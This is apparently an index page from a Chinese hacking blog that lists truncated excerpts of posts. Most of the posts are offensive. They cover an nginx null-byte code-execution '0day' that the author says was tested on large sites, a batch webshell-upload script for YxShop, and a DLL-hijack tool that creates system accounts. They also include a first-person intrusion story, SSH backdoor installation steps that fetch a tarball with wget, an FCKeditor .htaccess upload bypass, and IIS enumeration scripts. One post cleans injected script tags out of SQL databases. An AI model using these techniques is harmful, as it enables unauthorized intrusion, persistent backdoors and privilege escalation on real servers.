清除sql数据库挂马代码.txt

declare @delStr nvarchar(500) --set @delStr='<script src=https://www.webshell.cc/cn.js>' set @delStr='<script src=https://www.webshell.cc/cn.js></script>' /****************************...

- 阅读全文 -

常见编辑器漏洞

常见的编辑器漏洞有: ewebeditor ewebeditornet fckeditor editor southidceditor SouthidcEditor bigcneditor 一:ewebeditor为例 1:默认下载下来的后台: https://www.webshell.cc/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard ...

- 阅读全文 -

nginx的旧版本可能执行任意代码0day

这个绝对是大0day哦。非常给力。测试了几个大站。全OK。哈哈。跟上一次那个漏洞有的一比哦。 Ngnix在遇到%00空字节时与后端FastCGI处理不一致,导致可以在图片中嵌入PHP代码然后通过访问 webshell.jpg%00.php来执行其中的代码。影响版本:0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37。 请各位站长检查服务器版本,尽快升级...

- 阅读全文 -

YxShop 上传漏洞批量shell

这个是根据一篇文章来的思路 文章名字 好像叫做批量Getshell 一例吧 借用了里面在百度获取URL的代码!!自己写了上传shell的代码! php学的不是很好,大牛们看了就别踩了!! 这个主要是给大家批shell时拿来修改的! 这个是测试图 贴出来代码: <?php print_r(' [*]  Getshell for Exploits [-]  by : [email]cfking@...

- 阅读全文 -

提权工具Ws2Help.dll

上传到sougou目录,注意不要改名字。等待该目录有文件联网的时候就自动添加系统账号了。 使用方法:把此文件放到QQ 迅雷 BT 等工具的同目录下。运行后会导致系统执行创建用户                   需要创建的用户名和密码可以十六进制修改。 Ps: 一个程序的启动它会调用很多dll或者ocx组件,但是他是有一个顺序的。 比如这个迅雷,他启动时会调用Ws2Help.dll这个组件, 一...

- 阅读全文 -

记一次踩着别人的脚印入侵

话说今早不知道怎么逛到https://www.webshell.cc/1.txt那里去了PS:后来想起是村长大牛提交的黑页 看见别人挂这个多好看啊,于是小菜也是想起了来检测一番的念头,既然有了想法就开始干活吧,主站打不开了,估计是给弄坏了,于是想起旁注了,看看是不是独立的站点,打开土司的旁注查询,把域名放进去看看,幸亏不是独立的站点 哇!!这个站还真不少..72个,其实还是有好多没法打开.. 开始一...

- 阅读全文 -

ssh后门的设置与登入

ssh后门的设置与登入   1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门: shell-# wgethttp://192.168.1.188/sshbd.tgz shell-# tar zxvf sshbd.tgz sh...

- 阅读全文 -

FCKeditor编辑器全部版本另类上传漏洞

利用步骤: 1.创建一个htaccess文件: 代码内容: SetHandler application/x-httpd-php 2.实用编辑器上传htaccess文件. https://www.webshell.cc/FCKeditor/editor/filemanager/upload/test.html https://www.webshell.cc/FCKeditor/editor/filem...

- 阅读全文 -

iis的几个vbs脚本在渗透中的应用

有时候用aspxshell的iisspy功能看不到网站路径跟域名,可以尝试下下面这个方法 1.查询IIS里的所有网站 C:WINDOWSsystem32>cscript.exe iisweb.vbs /query Microsoft (R) Windows Script Host Version 5.6 版权所有(C) Microsoft Corporation 1996-2001。保留所有...

- 阅读全文 -